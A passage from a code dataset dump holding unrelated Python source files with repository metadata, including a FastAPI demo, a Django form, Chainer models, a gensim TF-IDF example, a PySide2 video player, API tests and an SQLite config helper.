sequence_lengths + appendix_lengths_padded\n max_length = torch.max( appended_sequences_lengths )\n\n mi = 0\n for si in range(padded_sequence.size(0)):\n\n # if dialogue is still running, add item from appendix\n if mask_current[si] == 1:\n # remove padding from padded_sequence; remove padding from appendix; concate both\n sequence.append( torch.cat( (padded_sequence[si, :sequence_lengths[si]], appendix[mi, :appendix_lengths[mi]]), dim=0) )\n mi += 1\n else:\n sequence.append(padded_sequence[si, :sequence_lengths[si]])\n\n lengths.append(len(sequence[-1]))\n\n # pad new sequence up to max_length\n pad = sequence[-1].new_zeros( ( (max_length-lengths[-1]), *list(sequence[-1].size()[1:])) )\n sequence[-1] = torch.cat( (sequence[-1], pad) )\n\n\n sequence = torch.stack(sequence)\n return sequence\n\ndef answer_class_to_token(answers, w2i):\n\n yes_mask = answers == 0\n no_mask = answers == 1\n na_mask = answers == 2\n\n answers.masked_fill_(yes_mask, w2i[''])\n answers.masked_fill_(no_mask, w2i[''])\n answers.masked_fill_(na_mask, w2i[''])\n\n return answers\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n # Dataset Settings\n parser.add_argument('-d', '--data_dir', type=str, default='data')\n parser.add_argument('-cd', '--coco_dir', type=str, default='/Users/timbaumgartner/MSCOCO')\n parser.add_argument('-mo', '--min_occ', type=int, default=3)\n parser.add_argument('-ms', '--max_sequence_length', type=int, default=100)\n\n # Experiment Settings\n parser.add_argument('-m', '--mode', type=str, choices=['baseline', 'dm1', 'dm2'], default='baseline')\n parser.add_argument('-mq', '--max_num_questions', type=int, default=5)\n parser.add_argument('-b', '--batch_size', type=int, default=32)\n parser.add_argument('-nw', '--num_workers', type=int, 
default=2)\n parser.add_argument('-v', '--print_every', type=int, default=100)\n parser.add_argument('-train', '--train_set', action='store_true')\n parser.add_argument('-test', '--test_set', action='store_true')\n\n\n # Hyperparameter\n parser.add_argument('--qgen_embedding_dim', type=int, default=512)\n parser.add_argument('--qgen_hidden_size', type=int, default=1024)\n parser.add_argument('--qgen_visual_embedding_dim', type=int, default=512)\n parser.add_argument('--strategy', type=str, choices=['greedy', 'sampling'], default='greedy')\n\n parser.add_argument('--guesser_word_embedding_dim', type=int, default=512)\n parser.add_argument('--guesser_hidden_size', type=int, default=512)\n parser.add_argument('--guesser_cat_embedding_dim', type=int, default=256)\n parser.add_argument('--guesser_mlp_hidden', type=int, default=512)\n\n parser.add_argument('--oracle_word_embedding_dim', type=int, default=300)\n parser.add_argument('--oracle_hidden_size', type=int, default=512)\n parser.add_argument('--oracle_cat_embedding_dim', type=int, default=512)\n parser.add_argument('--oracle_mlp_hidden', type=int, default=128)\n\n parser.add_argument('--dm_mlp_hidden', type=int, default=512)\n\n args = parser.parse_args()\n args.num_workers = min(cpu_count(), args.num_workers)\n\n main(args)\n","repo_name":"shekharRavi/ask-no-more-COLING2018","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":14680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14550646474","text":"from fastapi import FastAPI\r\n\r\napp = FastAPI()\r\n\r\n@app.get(\"/\")\r\nasync def root():\r\n return {\"greeting\":\"Hello world\"}\r\n\r\n@app.get(\"/users/{user_id}\")\r\nasync def user(user_id: str):\r\n return {\"user_id\":user_id}\r\n\r\n@app.get(\"/getUserInfo\")\r\ndef getUserInfo(id: int, name: str):\r\n return [{\r\n \"id\" : id,\r\n \"firstName\" : name\r\n }]\r\n","repo_name":"Rambabu1969/fastapi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40681131619","text":"def roman(number):\n number_inv = str(number)[::-1]\n\n uni = {\"0\": \"\",\n \"1\": \"I\",\n \"2\": \"II\",\n \"3\": \"III\",\n \"4\": \"IV\",\n \"5\": \"V\",\n \"6\": \"VI\",\n \"7\": \"VII\",\n \"8\": \"VIII\",\n \"9\": \"IX\"}\n \n dez = {}\n cen = {}\n mil = {}\n for n in uni:\n dez[n] = uni[n].replace(\"X\", \"C\").replace(\"I\", \"X\").replace(\"V\", \"L\")\n cen[n] = uni[n].replace(\"X\", \"M\").replace(\"I\", \"C\").replace(\"V\", \"D\")\n mil[n] = uni[n].replace(\"I\", \"M\").replace(\"V\", \"V-\")\n\n romano = []\n for n, i in enumerate(number_inv):\n if n == 0:\n romano.append(uni[i])\n elif n == 1:\n romano.append(dez[i])\n elif n == 2:\n romano.append(cen[i])\n else:\n romano.append(mil[i])\n\n return \"\".join(reversed(romano))\n","repo_name":"pedronora/exercism-python","sub_path":"roman-numerals/roman_numerals.py","file_name":"roman_numerals.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10696051230","text":"from django import forms\nfrom .models import Movie\n\nclass MovieForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.label_suffix = \"\" \n GENRE_A = '코미디'\n GENRE_B = '공포'\n GENRE_C = '로맨스'\n GENRE_CHOICES = [\n (\"\", 'Please Choose the 
Genre'),\n        (GENRE_A, '코미디'),\n        (GENRE_B, '공포'),\n        (GENRE_C, '로맨스'),\n    ]\n\n    title = forms.CharField(\n        label=\"Title\",\n        widget=forms.TextInput(\n            attrs={\n                'placeholder': \"Title\",\n                \"class\": \"form-control\"\n            }\n        ),\n    )\n    audience = forms.IntegerField(\n        label=\"Audience\",\n        widget=forms.NumberInput(\n            attrs={\n                'placeholder': 'audience',\n                \"class\": \"form-control\"\n            }\n        )\n    )\n    release_date = forms.DateTimeField(\n        label=\"Release date\",\n        widget=forms.DateInput(\n            attrs={\n                'type': 'date',\n                \"class\": \"form-control\"\n            }\n        )\n    )\n    genre = forms.ChoiceField(\n        label=\"Genre\",\n        choices=GENRE_CHOICES,\n        widget=forms.Select(\n            attrs={\n                \"class\": \"form-select\",\n            }\n        )\n    )\n    score = forms.FloatField(\n        label=\"Score\",\n        widget=forms.NumberInput(\n            attrs={\n                'type': 'number',\n                'placeholder': 'Score',\n                \"class\": \"form-control\",\n                'max': 5,\n                'min': 0.5,\n                'step': 0.5,\n            }\n        )\n    )\n    poster_url = forms.CharField(\n        label=\"Poster url\",\n        widget = forms.TextInput(\n            attrs={\n                'placeholder': 'Poster url',\n                \"class\": \"form-control\",\n            }\n        )\n    )\n    description = forms.CharField(\n        label=\"Description\",\n        widget=forms.Textarea(\n            attrs={\n                'placeholder': 'Description',\n                \"class\": \"form-control\"\n            }\n        )\n    )\n\n    class Meta:\n        model = Movie\n        fields = ('title', 'audience', 'release_date', 'genre', 'score', 'poster_url', 'description')\n\n    ","repo_name":"Eunyeol-Lucas/ssafy-pjt","sub_path":"pjt06/movies/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22699748694","text":"\"\"\"Models\n\"\"\"\nimport numpy as np\nimport chainer\nimport chainer.variable as variable\nfrom chainer.functions.activation import lstm\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nfrom collections import OrderedDict\nimport logging\nimport time\nfrom meta_st.utils import to_device\n\nclass ConvUnit(Chain):\n    def __init__(self, imaps, omaps, k=4, s=2, p=1, act=F.relu):\n        super(ConvUnit, self).__init__(\n            conv=L.Convolution2D(imaps, omaps, ksize=k, stride=s, pad=p, nobias=True),\n            bn=L.BatchNormalization(omaps, decay=0.9, use_cudnn=True),\n        )\n        self.act = act\n\n    def __call__(self, h, test=False):\n        h = self.conv(h)\n        h = self.bn(h, test)\n        h = self.act(h)\n        return h\n\nclass DeconvUnit(Chain):\n    def __init__(self, imaps, omaps, k=4, s=2, p=1, act=F.relu):\n        super(DeconvUnit, self).__init__(\n            deconv=L.Deconvolution2D(imaps, omaps, ksize=k, stride=s, pad=p, nobias=True),\n            bn=L.BatchNormalization(omaps, decay=0.9, use_cudnn=True),\n        )\n        self.act = act\n\n    def __call__(self, h, test=False):\n        h = self.deconv(h)\n        h = self.bn(h, test)\n        h = self.act(h)\n        return h\n\nclass Encoder(Chain):\n\n    def __init__(self, device=None, act=F.relu):\n\n        super(Encoder, self).__init__(\n            # ConvBlock0\n            conv00=ConvUnit(3, 96, k=3, s=1, p=1),\n            conv01=ConvUnit(96, 96, k=3, s=1, p=1),\n            conv02=ConvUnit(96, 96, k=3, s=1, p=1),\n            bn0=L.BatchNormalization(96),\n            # ConvBlock1\n            conv10=ConvUnit(96, 192, k=3, s=1, p=1),\n            conv11=ConvUnit(192, 192, k=3, s=1, p=1),\n            conv12=ConvUnit(192, 192, k=3, s=1, p=1),\n            bn1=L.BatchNormalization(192),\n            # ConvBlock3\n            conv20=ConvUnit(192, 192, k=3, s=1, p=0),\n            conv21=ConvUnit(192, 192, k=1, s=1, p=0),\n            conv22=ConvUnit(192, 10, k=1, s=1, p=0),\n
            bn2=L.BatchNormalization(10)\n        )\n        self.act = act\n        self.hiddens = []\n\n    def __call__(self, x, test=False):\n        self.hiddens = []\n\n        h = self.conv00(x, test)\n        h = self.conv01(h, test)\n        h = self.conv02(h, test)\n        h = F.max_pooling_2d(h, (2, 2))  # 32 -> 16\n        h = self.bn0(h, test)\n        self.hiddens.append(h)\n\n        h = self.conv10(h, test)\n        h = self.conv11(h, test)\n        h = self.conv12(h, test)\n        h = F.max_pooling_2d(h, (2, 2))  # 16 -> 8\n        h = self.bn1(h, test)\n        self.hiddens.append(h)\n\n        h = self.conv20(h, test)  # 8 -> 6\n        self.hiddens.append(h)\n        h = self.conv21(h, test)\n        h = self.conv22(h, test)\n        h = F.average_pooling_2d(h, (6, 6))  # 6 -> 1\n        h = self.bn2(h, test)\n        h = F.reshape(h, (h.shape[0], np.prod(h.shape[1:])))\n\n        return h\n\nclass Decoder(Chain):\n\n    def __init__(self, device=None, act=F.relu):\n\n        super(Decoder, self).__init__(\n            linear=L.Linear(10, 10*6*6),\n            bn=L.BatchNormalization(10*6*6),\n\n            # ConvBlock0\n            conv00=ConvUnit(10, 192, k=1, s=1, p=0),\n            conv01=ConvUnit(192, 192, k=1, s=1, p=0),\n            deconv02=DeconvUnit(192, 192, k=3, s=1, p=0),\n            bn0=L.BatchNormalization(192),\n\n            # ConvBlock1\n            conv10=ConvUnit(192, 192, k=3, s=1, p=1),\n            conv11=ConvUnit(192, 192, k=3, s=1, p=1),\n            conv12=ConvUnit(192, 96, k=3, s=1, p=1),\n            bn1=L.BatchNormalization(96),\n\n            # ConvBlock3\n            conv20=ConvUnit(96, 96, k=3, s=1, p=1),\n            conv21=ConvUnit(96, 96, k=3, s=1, p=1),\n            conv22=ConvUnit(96, 3, k=3, s=1, p=1),\n\n            # Unpool (Deconv)\n            deconv1=DeconvUnit(192, 192),\n            deconv2=DeconvUnit(96, 96),\n        )\n        self.act = act\n        self.hiddens = []\n\n    def __call__(self, x, test=False):\n        self.hiddens = []\n        h = self.linear(x)  # 1 -> 6\n        h = self.bn(h)\n        self.hiddens.append(h)\n        h = F.reshape(h, (x.shape[0], 10, 6, 6))\n\n        h = self.conv00(h, test)\n        h = self.conv01(h, test)\n        h = self.deconv02(h, test)  # 6 -> 8\n        self.hiddens.append(h)\n\n        h = self.bn0(h, test)\n        h = self.deconv1(h, test)  # 8 -> 16\n        self.hiddens.append(h)\n        h = self.conv10(h, test)\n        h = self.conv11(h, test)\n        h = self.conv12(h, test)\n\n        h = self.bn1(h, test)\n        h = self.deconv2(h, test)  # 16 -> 32\n        self.hiddens.append(h)\n        h = self.conv20(h, test)\n        h = self.conv21(h, test)\n        h = self.conv22(h, test)\n\n        return h\n","repo_name":"kzky/works","sub_path":"recon/recon/cifar10/cnn_model_007.py","file_name":"cnn_model_007.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28714214603","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/5/11 11:52 AM\n# @Author : sunchao\n\n\n\"\"\"Compute TF-IDF in Python.\"\"\"\nimport jieba\nfrom collections import Counter\n\nfrom gensim import corpora\nfrom gensim.models import Word2Vec, TfidfModel\n\n\n# Prepare the data: put the following 8 text samples into a list\ndocuments = [\"1)键盘是用于操作设备运行的一种指令和数据输入装置,也指经过系统安排操作一台机器或设备的一组功能键(如打字机、电脑键盘)\",\n             \"2)鼠标称呼应该是“鼠标器”,英文名“Mouse”,鼠标的使用是为了使计算机的操作更加简便快捷,来代替键盘那繁琐的指令。\",\n             \"3)中央处理器(CPU,Central Processing Unit)是一块超大规模的集成电路,是一台计算机的运算核心(Core)和控制核心( Control Unit)。\",\n             \"4)硬盘是电脑主要的存储媒介之一,由一个或者多个铝制或者玻璃制的碟片组成。碟片外覆盖有铁磁性材料。\",\n             \"5)内存(Memory)也被称为内存储器,其作用是用于暂时存放CPU中的运算数据,以及与硬盘等外部存储器交换的数据。\",\n             \"6)显示器(display)通常也被称为监视器。显示器是属于电脑的I/O设备,即输入输出设备。它是一种将一定的电子文件通过特定的传输设备显示到屏幕上再反射到人眼的显示工具。\",\n             \"7)显卡(Video card,Graphics card)全称显示接口卡,又称显示适配器,是计算机最基本配置、最重要的配件之一。\",\n             \"8)cache高速缓冲存储器一种特殊的存储器子系统,其中复制了频繁使用的数据以利于快速访问。\"]\n# The document to compare against\nnew_doc = \"内存又称主存,是CPU能直接寻址的存储空间,由半导体器件制成。\"\n\nprint('Preprocess the corpus: filter out low-frequency words and filler words')\nstopwords = set()\nprocessed_doc = [[word for word in jieba.cut(item) if word not in stopwords] for item 
in documents]\n\n# 1. Build the vocabulary from words that occur at least twice in the corpus\ncounter = Counter((word for sample in processed_doc for word in sample))\ncounter = dict(filter(lambda xx: xx[1] >= 2, sorted(counter.items(), key=lambda x: x[1], reverse=True)))\nprocessed_doc = [[word for word in item if word in counter] for item in processed_doc]\nfor doc in processed_doc:\n    print(doc)\n\n# 2. Build the dictionary (a mapping between words and ids)\nprint('Build the dictionary (a mapping between words and ids)')\ndictionary = corpora.Dictionary(processed_doc)\nprint(dictionary)\n# Print the dictionary: keys are words, values are their ids\nprint(dictionary.token2id)\n# dictionary.save('./src/dict4tfidf.dict')\n# dictionary = corpora.Dictionary.load('./src/dict4tfidf.dict')\n\nprint('Build the corpus')\n# Convert every document into a bag-of-words vector\ncorpus = [dictionary.doc2bow(text) for text in processed_doc]\nfor item in corpus:\n    print(item)\n\nprint('Initialize the model')\n# Initialize a tf-idf model that converts vectors from bag-of-words integer counts to the new representation (tf-idf real-valued weights)\ntfidf = TfidfModel(corpus, normalize=False)\ntfidf.save(\"./src/my_model.tfidf\")\n\n# Convert the whole corpus to the tf-idf representation\n# Load the model\ntfidf = TfidfModel.load(\"./src/my_model.tfidf\")\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n    print(doc)\n\n\n","repo_name":"sc1054/LR_similarity","sub_path":"gensim_test/gensim_tfidf.py","file_name":"gensim_tfidf.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29923006457","text":"\ndef num_then_char(lst):\n    lengths = list(map(len, lst))\n    numbers = sorted([num for sublst in lst for num in sublst if type(num) in [int, float]])\n    chars = sorted([c for sublst in lst for c in sublst if type(c) == str])\n    all = numbers + chars\n    res = []\n    slice_start = 0\n    slice_end = lengths[0]\n    for i in range(1, len(lengths)):\n        res.append(all[slice_start:slice_end])\n        slice_start = slice_end\n        slice_end = slice_start + lengths[i]\n        # print(\"start=\",slice_start,\"end=\", slice_end,\"i=\",lengths[i])\n    res.append(all[slice_start:slice_end])\n    return res\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"A52kaKXg42bB7PKHE_18.py","file_name":"A52kaKXg42bB7PKHE_18.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70631670493","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = np.ones([250, 600, 3])*255\n\nbloat_grid = np.ones([11,11,3])*225\nbloat_grid[:,:,1:3] = 0\n\n# Drawing the rectangular obstacles\nimg[0:100, 100:150, :] = 0\nimg[-100:-1, 100:150, :] = 0\n\n# Polygon corner points coordinates\nhex_pts = np.array([[300, 200], [300+65, 125+32],\n \t[300+65, 125-32], [300, 50],\n \t[300-65, 125-32], [300-65, 125+32]], np.int32)\n \n \ntri_pts = np.array([[460, 225], [510, 125], [460, 25]])\n\ncolor = (0, 0, 0)\n# img = cv2.polylines(img, np.array([hex_pts]), True, color, 5)\nimg = cv2.fillPoly(img, np.array([hex_pts]), color)\nimg = cv2.fillPoly(img, np.array([tri_pts]), color)\n\nfor i in range(5,img.shape[0]-5):\n\tfor j in range(5,img.shape[1]-5):\n\t\tif np.sum(img[i,j]) == 0:\n\t\t\t# print(i,j)\n\t\t\t# print(img[i-5:i+5, j-5:j+5].shape)\n\t\t\t# print(bloat_grid.shape)\n\t\t\timg[i-5:i+6, j-5:j+6] = cv2.bitwise_and(img[i-5:i+6, j-5:j+6, :], bloat_grid)\n\ncv2.imshow('img', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"muditsingal/ENPM661_project2","sub_path":"p2_code.py","file_name":"p2_code.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3366955240","text":"\"\"\"\n贷款主流程测试\n\"\"\"\n\nfrom testcases.base_cases import BaseCase\n\n\nclass TestLoanFlow(BaseCase):\n name = \"贷款主流程\"\n\n # 1.注册\n def test_01register(self):\n case = {\n 'title': '用户注册',\n 'url': 'register',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v1\"},'\n '\"json\": {\"mobile_phone\": \"18888888888\", \"pwd\": \"12345678\"}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n\n # 2.登录\n def test_02login(self):\n case = {\n 'title': '用户登录',\n 'url': 'login',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},'\n '\"json\": {\"mobile_phone\": \"18888888888\", \"pwd\": \"12345678\"}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n # 测试成功需要将返回的Auth绑定到类属性中给下面的函数使用\n self.__class__.token = self.response.json()['data']['token_info']['token']\n self.__class__.member_id = self.response.json()['data']['id']\n\n\n # 3.充值\n\n def test_03recharge(self):\n case = {\n 'title': '用户充值',\n 'url': 'recharge',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\",\"Authorization\":\"Bearer #token#\"},'\n '\"json\": {\"member_id\":#member_id#,\"amount\":666}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n\n\n\n","repo_name":"neilzhang1/autoTest","sub_path":"testcases/test_loan_flow.py","file_name":"test_loan_flow.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9541487180","text":"# P1464 Function https://www.luogu.com.cn/problem/P1464\n# https://www.luogu.com.cn/record/70293156\n\nfrom typing import Dict, Tuple\n\nmem: Dict[Tuple[int, int, int], int] = {}\nresult = ''\n\n\ndef w(a: int, b: int, c: int) -> int:\n param = (a, b, c)\n if param not in mem:\n if a <= 0 or b <= 0 or c <= 0:\n mem[param] = 1\n elif a > 20 or b > 20 or c > 20:\n mem[param] = w(20, 20, 20)\n elif a < b and b < c:\n mem[param] = w(a, b, c - 1) + w(a, b - 1, c - 1) - w(a, b - 1, c)\n else:\n mem[param] = w(a - 1, b, c) + w(a - 1, b - 1, c) + w(\n a - 1, b, c - 1) - w(a - 1, b - 1, c - 1)\n return mem[param]\n\n\nwhile True:\n a, b, c = map(int, input().split())\n if a == -1 and b == -1 and c == -1:\n break\n result += f'w({a}, {b}, {c}) = {w(a,b,c)}\\n'\nprint(result, end='')\n","repo_name":"frederick-wang/algorithm-exercises","sub_path":"luogu/P1464 Function/test.legacy.py","file_name":"test.legacy.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71486166811","text":"import mailcap\n\nimport cv2\nfrom PySide2.QtGui import QPixmap, QImage\nimport sys\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtMultimediaWidgets import QVideoWidget\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PySide2.QtGui import QIcon\nimport qimage2ndarray\n\nclass VideoWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super(VideoWindow, self).__init__(parent)\n self.setWindowTitle(\"Video Player\")\n\n self.imageLabel = QLabel()\n self.imageLabel.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n self.imageLabel.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n self.imageLabel.setScaledContents(True)\n self.imageLabel.setPixmap(QPixmap())\n\n self.playButton = QPushButton()\n 
        self.playButton.setEnabled(False)\n        self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n        self.playButton.clicked.connect(self.play)\n\n        self.btn_Trans = QPushButton('Trans')\n        self.btn_Trans.setEnabled(False)\n        self.btn_Trans.clicked.connect(self.Trans)\n\n        self.btn_af_bf = QPushButton('After')\n        self.btn_af_bf.setEnabled(False)\n        self.btn_af_bf.clicked.connect(self.After)\n\n        self.btn_save = QPushButton('Save')\n        self.btn_save.setEnabled(False)\n        self.btn_save.clicked.connect(self.Save)\n\n        self.frame_timer = QTimer()\n        self.frame_timer.timeout.connect(self.videostart)\n\n        self.positionSlider = QSlider(Qt.Horizontal)\n        self.positionSlider.setRange(0, 0)\n        self.positionSlider.sliderMoved.connect(self.setPosition)\n\n        self.errorLabel = QLabel()\n        self.errorLabel.setSizePolicy(QSizePolicy.Preferred,\n                                      QSizePolicy.Maximum)\n\n        self.cap = cv2.VideoCapture()\n        self.fps = 30\n        self.step = 0\n        self.pause = False\n\n        # Create new action\n        openAction = QAction(QIcon('open.png'), '&Video', self)\n        openAction.setShortcut('Ctrl+O')\n        openAction.setStatusTip('Open movie')\n        openAction.triggered.connect(self.openFile)\n\n        # Create exit action\n        exitAction = QAction(QIcon('exit.png'), '&Exit', self)\n        exitAction.setShortcut('Ctrl+Q')\n        exitAction.setStatusTip('Exit application')\n        exitAction.triggered.connect(self.exitCall)\n\n        # Load Model action\n        loadAction = QAction(QIcon('open.png'), '&Model', self)\n        loadAction.setShortcut('Ctrl+M')\n        loadAction.setStatusTip('Load Model')\n        loadAction.triggered.connect(self.openModel)\n\n        # Create menu bar and add action\n        menuBar = self.menuBar()\n        fileMenu = menuBar.addMenu('&File')\n        fileMenu.addAction(loadAction)\n        fileMenu.addAction(openAction)\n        fileMenu.addAction(exitAction)\n\n        # Create a widget for window contents\n        wid = QWidget(self)\n        self.setCentralWidget(wid)\n\n        # Create layouts to place inside widget\n        controlLayout = QHBoxLayout()\n        controlLayout.setContentsMargins(0, 0, 0, 0)\n        controlLayout.addWidget(self.playButton)\n        controlLayout.addWidget(self.positionSlider)\n\n        # Set List Widget\n        self.listImage = QListWidget()\n        self.listImage.setAlternatingRowColors(True)\n\n        self.listObject = QListWidget()\n        self.listObject.setAlternatingRowColors(True)\n\n        layout = QHBoxLayout()\n\n        # Set Left Box Layer\n        L_VBox = QVBoxLayout()\n        L_VBox.addWidget(self.imageLabel)\n        L_VBox.addLayout(controlLayout)\n        L_VBox.addWidget(self.errorLabel)\n\n        # Set Right Box Layer\n        R_widget = QWidget()\n        R_VBox = QVBoxLayout()\n\n        R_VBox.addWidget(self.listImage)\n        R_VBox.addWidget(self.listObject)\n        R_VBox.addWidget(self.btn_Trans)\n        R_VBox.addWidget(self.btn_af_bf)\n        R_VBox.addWidget(self.btn_save)\n        R_widget.setLayout(R_VBox)\n        R_widget.setFixedWidth(200)\n\n        # Set Main window\n        layout.addLayout(L_VBox)\n        layout.addWidget(R_widget)\n\n        # Set widget to contain window contents\n        wid.setLayout(layout)\n\n    def Trans(self):\n        pass\n    def After(self):\n        pass\n    def Save(self):\n        pass\n    def videostart(self):\n        if self.step >= self.cap.get(cv2.CAP_PROP_FRAME_COUNT):\n            return\n        frame = self.video_array[self.step]\n\n        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n        image = qimage2ndarray.array2qimage(frame)\n\n        self.imageLabel.setPixmap(QPixmap.fromImage(image))\n        self.step += 1\n        self.positionSlider.setValue(self.step)\n\n    def openModel(self):\n        fileName, _ = QFileDialog.getOpenFileName(self, \"Open Model\",\n                                                  QDir.homePath())\n        if fileName != '':\n            self.listImage.addItem(fileName)\n\n    def openFile(self):\n        fileName, _ = QFileDialog.getOpenFileName(self, 
\"Open Movie\",\n QDir.homePath())\n\n if fileName != '':\n self.playButton.setEnabled(True)\n self.setWindowTitle(fileName.split('/')[-1])\n self.cap.open(fileName)\n self.fps = self.cap.get(cv2.CAP_PROP_FPS)\n self.hallframecount = self.cap.get(cv2.CAP_PROP_FRAME_COUNT)\n self.positionSlider.setMaximum(self.hallframecount)\n self.video_array = []\n\n i = 0\n while i <= self.cap.get(cv2.CAP_PROP_FRAME_COUNT):\n ret, frame = self.cap.read()\n self.video_array.append(frame)\n i += 1\n\n\n def exitCall(self):\n sys.exit(app.exec_())\n\n def play(self):\n if not self.pause:\n self.frame_timer.start(int(1000 // self.fps))\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))\n else:\n self.frame_timer.stop()\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.pause = not self.pause\n\n def mediaStateChanged(self, state):\n if self.mediaPlayer.state() == QMediaPlayer.PlayingState:\n self.playButton.setIcon(\n self.style().standardIcon(QStyle.SP_MediaPause))\n else:\n self.playButton.setIcon(\n self.style().standardIcon(QStyle.SP_MediaPlay))\n\n def positionChanged(self, position):\n self.positionSlider.setValue(position)\n\n def durationChanged(self, duration):\n self.positionSlider.setRange(0, duration)\n\n def setPosition(self, position):\n self.step = position\n\n def handleError(self):\n self.playButton.setEnabled(False)\n self.errorLabel.setText(\"Error: \" + self.mediaPlayer.errorString())\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n player = VideoWindow()\n player.resize(640, 480)\n player.show()\n sys.exit(app.exec_())","repo_name":"msoo6465/python_practice","sub_path":"gui_basic/videoPlayer.py","file_name":"videoPlayer.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39831021586","text":"from webpage.config import *\nimport sqlite3\nfrom flask import g\n\nDATABASE = 'webpage/static/spectro_scope.db'\n\ndef connect_db():\n return sqlite3.connect('webpage/static/spectro_scope.db')\n\ndef delete_db(app):\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"DELETE FROM spectro_scope\")\n conn.commit()\n conn.close()\n\ndef load_db(app):\n \n spectro_scope_config = {}\n # Create empty list for appending every value\n config_data = list()\n\n spectro_scope_config['integration_time'] = INTEGRATION_TIME\n config_data.append(spectro_scope_config['integration_time'])\n\n spectro_scope_config['integration_factor'] = INTEGRATION_FACTOR\n config_data.append(spectro_scope_config['integration_factor'])\n\n spectro_scope_config['threshold'] = THRESHOLD\n config_data.append(spectro_scope_config['threshold'])\n\n # Transform config_data list into a tuple\n config_data = tuple(config_data)\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"INSERT INTO spectro_scope VALUES (?,?,?)\", config_data)\n conn.commit()\n conn.close()\n\ndef init_db(app):\n conn = connect_db()\n c = conn.cursor()\n try:\n c.execute('''create table spectro_scope (INTEGRATION_TIME real,\n INTEGRATION_FACTOR real,\n THRESHOLD int\n )''')\n load_db(app)\n\n except sqlite3.OperationalError as e:\n print('table spectro_scope already exists' in str(e))\n conn.commit()\n conn.close()\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n 
    return db\n\n# Function for sql UPDATE statement string building\ndef sql_stat_build(str1,str2,cont,listM,valueSP):\n    # If value is threshold convert to int\n    if str2 == \"THRESHOLD=?\":\n        listM.append(int(valueSP))\n    else:\n        listM.append(float(valueSP))\n\n    if cont == 0:\n        str1 += str2\n    else:\n        str1 += \",\" + str2\n\n    return str1\n\ndef set_spectro_scope(app,**spectro_scope_config):\n    with app.app_context():\n        conn = connect_db()\n        # Aux variable for value control\n        value_control = 0\n        # Create string where SQL statements will be added\n        string_sql = \"UPDATE spectro_scope SET \"\n        # Create empty list where values to update will be appended\n        l_spectro_scope = []\n\n        configuration_mapping = {\n            'integration_time' : 'INTEGRATION_TIME',\n            'integration_factor' : 'INTEGRATION_FACTOR',\n            'threshold' : 'THRESHOLD',\n        }\n\n        for variable in configuration_mapping.keys():\n            if spectro_scope_config[variable]:\n                config_str = f\"{configuration_mapping[variable]}=?\"\n                string_sql = sql_stat_build(string_sql, config_str, value_control, l_spectro_scope, 